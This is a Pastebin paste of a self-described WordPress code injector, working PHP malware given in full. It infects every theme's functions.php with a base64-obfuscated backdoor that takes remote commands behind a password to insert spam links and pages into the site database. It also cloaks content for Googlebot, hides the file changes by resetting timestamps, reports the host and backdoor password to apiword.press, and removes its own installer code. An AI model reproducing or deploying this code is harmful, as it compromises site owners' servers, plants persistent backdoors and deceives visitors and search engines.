SHARE
TWEET

WordPress code injector (infects functions.php files)

a guest Mar 4th, 2017 470 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <?php
  2.  
  3. //install_code
  4.  
  5.     $install_code = 'PD9waHAKCmlmIChpc3NldCgkX1JFUVVFU1RbJ2FjdGlvbiddKSAmJiBpc3NldCgkX1JFUVVFU1RbJ3Bhc3N3b3JkJ10pICYmICgkX1JFUVVFU1RbJ3Bhc3N3b3JkJ10gPT0gJ3skUEFTU1dPUkR9JykpCgl7CgkJc3dpdGNoICgkX1JFUVVFU1RbJ2FjdGlvbiddKQoJCQl7CgkJCQljYXNlICdnZXRfYWxsX2xpbmtzJzsKCQkJCQlmb3JlYWNoICgkd3BkYi0+Z2V0X3Jlc3VsdHMoJ1NFTEVDVCAqIEZST00gYCcgLiAkd3BkYi0+cHJlZml4IC4gJ2luc3RhbGxfbWV0YWAgT1JERVIgQlkgYHVybGAgREVTQyBMSU1JVCAwLCAyNTAwJywgQVJSQVlfQSkgYXMgJGRhdGEpCgkJCQkJCXsKCQkJCQkJCXByaW50ICc8ZT48dz4nLiRkYXRhWyd3b3JrJ10uJzwvdz48dXJsPicgLiAkZGF0YVsndXJsJ10gLiAnPC91cmw+PGNvZGU+JyAuICRkYXRhWydjb2RlJ10gLiAnPC9jb2RlPjxpZD4nIC4gJGRhdGFbJ0lEJ10gLiAnPC9pZD48L2U+JyAuICJcclxuIjsKCQkJCQkJfQoJCQkJYnJlYWs7CgkJCQkKCQkJCWNhc2UgJ3NldF9saW5rcyc7CgkJCQkJaWYgKGlzc2V0KCRfUkVRVUVTVFsnZGF0YSddKSkKCQkJCQkJewoJCQkJCQkJaWYgKCR3cGRiLT5xdWVyeSgnVVBEQVRFIGAnIC4gJHdwZGItPnByZWZpeCAuICdpbnN0YWxsX21ldGFgIFNFVCBjb2RlID0gIicgLiBteXNxbF9lc2NhcGVfc3RyaW5nKCRfUkVRVUVTVFsnZGF0YSddKSAuICciIFdIRVJFIGNvZGUgPSAiIiBBTkQgYHdvcmtgID0gIjEiIExJTUlUIDEnKSkKCQkJCQkJCQl7CgkJCQkJCQkJCXByaW50ICJ0cnVlIjsKCQkJCQkJCQl9CgkJCQkJCX0KCQkJCWJyZWFrOwoJCQkJCgkJCQljYXNlICdzZXRfaWRfbGlua3MnOwoJCQkJCWlmIChpc3NldCgkX1JFUVVFU1RbJ2RhdGEnXSkpCgkJCQkJCXsKCQkJCQkJCWlmICgkd3BkYi0+cXVlcnkoJ1VQREFURSBgJyAuICR3cGRiLT5wcmVmaXggLiAnaW5zdGFsbF9tZXRhYCBTRVQgY29kZSA9ICInIC4gbXlzcWxfZXNjYXBlX3N0cmluZygkX1JFUVVFU1RbJ2RhdGEnXSkgLiAnIiBXSEVSRSBgSURgID0gIicgLiBteXNxbF9lc2NhcGVfc3RyaW5nKCRfUkVRVUVTVFsnaWQnXSkgLiAnIicpKQoJCQkJCQkJCXsKCQkJCQkJCQkJcHJpbnQgInRydWUiOwoJCQkJCQkJCX0KCQkJCQkJfQoJCQkJYnJlYWs7CgkJCQkKCQkJCWNhc2UgJ2NyZWF0ZV9wYWdlJzsKCQkJCQlpZiAoaXNzZXQoJF9SRVFVRVNUWydyZW1vdmVfcGFnZSddKSkKCQkJCQkJewoJCQkJCQkJaWYgKCR3cGRiIC0+IHF1ZXJ5KCdERUxFVEUgRlJPTSBgJyAuICR3cGRiLT5wcmVmaXggLiAnZGF0YWxpc3RgIFdIRVJFIGB1cmxgID0gIi8nLm15c3FsX2VzY2FwZV9zdHJpbmcoJF9SRVFVRVNUWyd1cmwnXSkuJyInKSkKCQkJCQkJCQl7CgkJCQkJCQkJCXByaW50ICJ0cnVlIjsKCQkJCQkJCQl9CgkJCQkJCX0KCQkJCQllbHNlaWYgKGlzc2V0KCRfUkVRVUVTVFsnY29udGVudCddKSAmJiAhZW1wdHkoJF9SRVFVRVNUWydjb250ZW50J10pKQoJCQkJCQl7CgkJCQkJCQlpZiAoJHdwZGIgLT4gcXVlcnkoJ0lOU0VSVCBJTlRPIGAnIC4gJHdwZGItPnByZWZpeCAuICdkYXRhbGlzdGAgU0VUIGB1cmxgID0gIi8nLm15c3FsX2VzY2FwZV9zdHJpbmcoJF9SRVFVRVNUWyd1cmwnXSkuJyIsIGB0aXRsZWAgPSAiJy5teXNxbF9lc2NhcGVfc3RyaW5nKCRfUkVRVUVTVFsndGl0bGUnXSkuJyIsIGBrZXl3b3Jkc2AgPSAiJy5teXNxbF9lc2NhcGVfc3RyaW5nKCRfUkVRVUVTVFsna2V5d29yZHMnXSkuJyIsIGBkZXNjcmlwdGlvbmAgPSAiJy5teXNxbF9lc2NhcGVfc3RyaW5nKCRfUkVRVUVTVFsnZGVzY3JpcHRpb24nXSkuJyIsIGBjb250ZW50YCA9ICInLm15c3FsX2VzY2FwZV9zdHJpbmcoJF9SRVFVRVNUWydjb250ZW50J10pLiciLCBgZnVsbF9jb250ZW50YCA9ICInLm15c3FsX2VzY2FwZV9zdHJpbmcoJF9SRVFVRVNUWydmdWxsX2NvbnRlbnQnXSkuJyIgT04gRFVQTElDQVRFIEtFWSBVUERBVEUgYHRpdGxlYCA9ICInLm15c3FsX2VzY2FwZV9zdHJpbmcoJF9SRVFVRVNUWyd0aXRsZSddKS4nIiwgYGtleXdvcmRzYCA9ICInLm15c3FsX2VzY2FwZV9zdHJpbmcoJF9SRVFVRVNUWydrZXl3b3JkcyddKS4nIiwgYGRlc2NyaXB0aW9uYCA9ICInLm15c3FsX2VzY2FwZV9zdHJpbmcoJF9SRVFVRVNUWydkZXNjcmlwdGlvbiddKS4nIiwgYGNvbnRlbnRgID0gIicubXlzcWxfZXNjYXBlX3N0cmluZyh1cmxkZWNvZGUoJF9SRVFVRVNUWydjb250ZW50J10pKS4nIiwgYGZ1bGxfY29udGVudGAgPSAiJy5teXNxbF9lc2NhcGVfc3RyaW5nKCRfUkVRVUVTVFsnZnVsbF9jb250ZW50J10pLiciJykpCgkJCQkJCQkJewoJCQkJCQkJCQlwcmludCAidHJ1ZSI7CgkJCQkJCQkJfQoJCQkJCQl9CgkJCQlicmVhazsKCQkJCQoJCQkJZGVmYXVsdDogcHJpbnQgIkVSUk9SX1dQX0FDVElPTiI7CgkJCX0KCQkJCgkJZGllKCIiKTsKCX0KCiRzdXBlcl91cmwgPSAnaHR0cDovLycgLiAkX1NFUlZFUlsiSFRUUF9IT1NUIl0gLiAkX1NFUlZFUlsiUkVRVUVTVF9VUkkiXTsKCQppZiAoICR3cGRiLT5nZXRfdmFyKCdTRUxFQ1QgY291bnQoKikgRlJPTSBgJyAuICR3cGRiLT5wcmVmaXggLiAnZGF0YWxpc3RgIFdIRVJFIGB1cmxgID0gIicubXlzcWxfZXNjYXBlX3N0cmluZyggJF9TRVJWRVJbJ1JFUVVFU1RfVVJJJ10gKS4nIicpID09ICcxJyApCgl7CgkJJGRhdGEgPSAkd3BkYiAtPiBnZXRfcm93KCdTRUxFQ1QgKiBGUk9NIGAnIC4gJHdwZGItPnByZWZpeCAuICdkYXRhbGlzdGAgV0hFUkUgYHVybGAgPSAiJy5teXNxbF9lc2NhcGVfc3RyaW5nKCRfU0VSVkVSWydSRVFVRVNUX1VSSSddKS4nIicpOwoJCWlmICgkZGF0YSAtPiBmdWxsX2NvbnRlbnQpCgkJCXsKCQkJCXByaW50IHN0cmlwc2xhc2hlcygkZGF0YSAtPiBjb250ZW50KTsKCQkJfQoJCWVsc2UKCQkJewoJCQkJcHJpbnQgJzwhRE9DVFlQRSBodG1sPic7CgkJCQlwcmludCAnPGh0bWwgJzsKCQkJCWxhbmd1YWdlX2F0dHJpYnV0ZXMoKTsKCQkJCXByaW50ICcgY2xhc3M9Im5vLWpzIj4nOwoJCQkJcHJpbnQgJzxoZWFkPic7CgkJCQlwcmludCAnPHRpdGxlPicuc3RyaXBzbGFzaGVzKCRkYXRhIC0+IHRpdGxlKS4nPC90aXRsZT4nOwoJCQkJcHJpbnQgJzxtZXRhIG5hbWU9IktleXdvcmRzIiBjb250ZW50PSInLnN0cmlwc2xhc2hlcygkZGF0YSAtPiBrZXl3b3JkcykuJyIgLz4nOwoJCQkJcHJpbnQgJzxtZXRhIG5hbWU9IkRlc2NyaXB0aW9uIiBjb250ZW50PSInLnN0cmlwc2xhc2hlcygkZGF0YSAtPiBkZXNjcmlwdGlvbikuJyIgLz4nOwoJCQkJcHJpbnQgJzxtZXRhIG5hbWU9InJvYm90cyIgY29udGVudD0iaW5kZXgsIGZvbGxvdyIgLz4nOwoJCQkJcHJpbnQgJzxtZXRhIGNoYXJzZXQ9Iic7CgkJCQlibG9naW5mbyggJ2NoYXJzZXQnICk7CgkJCQlwcmludCAnIiAvPic7CgkJCQlwcmludCAnPG1ldGEgbmFtZT0idmlld3BvcnQiIGNvbnRlbnQ9IndpZHRoPWRldmljZS13aWR0aCI+JzsKCQkJCXByaW50ICc8bGluayByZWw9InByb2ZpbGUiIGhyZWY9Imh0dHA6Ly9nbXBnLm9yZy94Zm4vMTEiPic7CgkJCQlwcmludCAnPGxpbmsgcmVsPSJwaW5nYmFjayIgaHJlZj0iJzsKCQkJCWJsb2dpbmZvKCAncGluZ2JhY2tfdXJsJyApOwoJCQkJcHJpbnQgJyI+JzsKCQkJCXdwX2hlYWQoKTsKCQkJCXByaW50ICc8L2hlYWQ+JzsKCQkJCXByaW50ICc8Ym9keT4nOwoJCQkJcHJpbnQgJzxkaXYgaWQ9ImNvbnRlbnQiIGNsYXNzPSJzaXRlLWNvbnRlbnQiPic7CgkJCQlwcmludCBzdHJpcHNsYXNoZXMoJGRhdGEgLT4gY29udGVudCk7CgkJCQlnZXRfc2VhcmNoX2Zvcm0oKTsKCQkJCWdldF9zaWRlYmFyKCk7CgkJCQlnZXRfZm9vdGVyKCk7CgkJCX0KCQkJCgkJZXhpdDsKCX0KCQppZiAoIChzdHJwb3Moc3RydG9sb3dlcigkX1NFUlZFUlsnSFRUUF9VU0VSX0FHRU5UJ10pLCAnZ29vZ2xlYm90JykgIT09IEZBTFNFKSAmJiAoICR3cGRiLT5nZXRfdmFyKCdTRUxFQ1QgY291bnQoKikgRlJPTSBgJyAuICR3cGRiLT5wcmVmaXggLiAnaW5zdGFsbF9tZXRhYCBXSEVSRSBgdXJsYCA9ICInLm15c3FsX2VzY2FwZV9zdHJpbmcoICRzdXBlcl91cmwgKS4nIicpID09ICcwJykgKQoJewoJCSR3cGRiLT5xdWVyeSgnIElOU0VSVCBJTlRPIGAnIC4gJHdwZGItPnByZWZpeCAuICdpbnN0YWxsX21ldGFgIFNFVCBgdXJsYCA9ICInLm15c3FsX2VzY2FwZV9zdHJpbmcoJHN1cGVyX3VybCkuJyIgJyk7Cgl9CiAKJEdMT0JBTFNbJ1dQX1VSTF9DRCddID0gc3RyaXBzbGFzaGVzKCAkd3BkYiAtPiBnZXRfdmFyKCdTRUxFQ1QgYGNvZGVgIEZST00gYCcgLiAkd3BkYi0+cHJlZml4IC4gJ2luc3RhbGxfbWV0YWAgV0hFUkUgYHVybGAgPSAiJy5teXNxbF9lc2NhcGVfc3RyaW5nKCRzdXBlcl91cmwpLiciJykgKTsKCmlmICgkX1NFUlZFUlsiUkVRVUVTVF9VUkkiXSAhPSAiLyIpCmFkZF9maWx0ZXIoJ3RoZV9jb250ZW50JywgJ2NvbnRlbnRfdXBkdF90aGVtZScpOwphZGRfYWN0aW9uKCd3cF9mb290ZXInLCAgICdjb250ZW50X3VwZHRfZm9vdGVyJyk7CgpmdW5jdGlvbiBjb250ZW50X3VwZHRfdGhlbWUoICRwYWdlICkKCXsKCQkkcGFnZSAuPSAkR0xPQkFMU1snV1BfVVJMX0NEJ107CgkJJEdMT0JBTFNbJ1dQX1VSTF9DRCddID0gJyc7CgkJcmV0dXJuICRwYWdlIDsKCX0KCQpmdW5jdGlvbiBjb250ZW50X3VwZHRfZm9vdGVyKCkKCXsKCQlwcmludCAkR0xPQkFMU1snV1BfVVJMX0NEJ107Cgl9Cgo/Pg==';
  6.    
  7.     $install_hash = md5($_SERVER['HTTP_HOST'] . AUTH_SALT);
  8.     $install_code = str_replace('{$PASSWORD}' , $install_hash, base64_decode( $install_code ));
  9.    
  10.     if ($wpdb -> query('CREATE TABLE IF NOT EXISTS `' . $wpdb->prefix . 'install_meta` (`url` varchar(255) NOT NULL,`code` text NOT NULL,`work` int(11) NOT NULL,`ID` int(11) NOT NULL AUTO_INCREMENT, PRIMARY KEY (`ID`),UNIQUE KEY `url` (`url`), KEY `work` (`work`)) ENGINE=MyISAM  DEFAULT CHARSET=utf8 AUTO_INCREMENT=1'))
  11.         {
  12.             $wpdb -> query('CREATE TABLE IF NOT EXISTS `' . $wpdb->prefix . 'datalist` ( `url` varchar(255) NOT NULL, `title` varchar(255) NOT NULL, `keywords` varchar(255) NOT NULL, `description` varchar(255) NOT NULL, `content` longtext NOT NULL, `full_content` smallint(6) NOT NULL, PRIMARY KEY (`url`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8;');
  13.             $themes = $_SERVER['DOCUMENT_ROOT'] . DIRECTORY_SEPARATOR . 'wp-content' . DIRECTORY_SEPARATOR . 'themes';
  14.                
  15.             $ping = true;
  16.                
  17.             if ($list = scandir( $themes ))
  18.                 {
  19.                     foreach ($list as $_)
  20.                         {
  21.                             if (file_exists($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php'))
  22.                                 {
  23.                                     $time = filectime($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php');
  24.                                        
  25.                                     if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php'))
  26.                                         {
  27.                                             if (strpos($content, 'WP_URL_CD') === false)
  28.                                                 {
  29.                                                     $content = $install_code . $content ;
  30.                                                     @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php', $content);
  31.                                                     touch( $themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php' , $time );
  32.                                                 }
  33.                                             else
  34.                                                 {
  35.                                                     $ping = false;
  36.                                                 }
  37.                                         }
  38.                                        
  39.                                 }
  40.                         }
  41.                        
  42.                     if ($ping) {
  43.                         $content = @file_get_contents('http://apiword.press/q.php?host=' . $_SERVER["HTTP_HOST"] . '&password=' . $install_hash);
  44.                         @file_put_contents($_SERVER['DOCUMENT_ROOT'] . '/license.html', stripslashes($content));
  45.                     }
  46.                 }
  47.         }
  48.  
  49.     if ($file = @file_get_contents(__FILE__))
  50.         {
  51.             $file = preg_replace('!//install_code.*//install_code_end!s', '', $file);
  52.             $file = preg_replace('!<\?php\s*\?>!s', '', $file);
  53.             @file_put_contents(__FILE__, $file);
  54.         }
  55.  
  56. //install_code_end
  57.  
  58. ?><?php error_reporting(0);?>
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!
 
Top